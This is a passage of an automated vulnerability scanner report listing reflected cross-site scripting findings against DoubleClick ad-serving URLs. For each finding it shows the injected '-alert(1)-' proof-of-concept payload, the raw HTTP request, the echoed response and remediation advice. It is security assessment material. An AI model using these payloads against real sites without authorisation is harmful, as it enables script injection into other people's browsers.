User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5909"-alert(1)-"a7ebfd9570c was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97db5'-alert(1)-'4e226fa9882 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a57a'-alert(1)-'b094c8c4161 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f305"-alert(1)-"afeb150ce3f was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3fhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9518e'-alert(1)-'46a7facb548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f24ed"-alert(1)-"8ce055443cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7af86"-alert(1)-"e31326cfed3 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf52'-alert(1)-'3a8faa3de5c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6485"-alert(1)-"096b3fe0a0 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6762

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bbcd'-alert(1)-'4023a71aeed was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

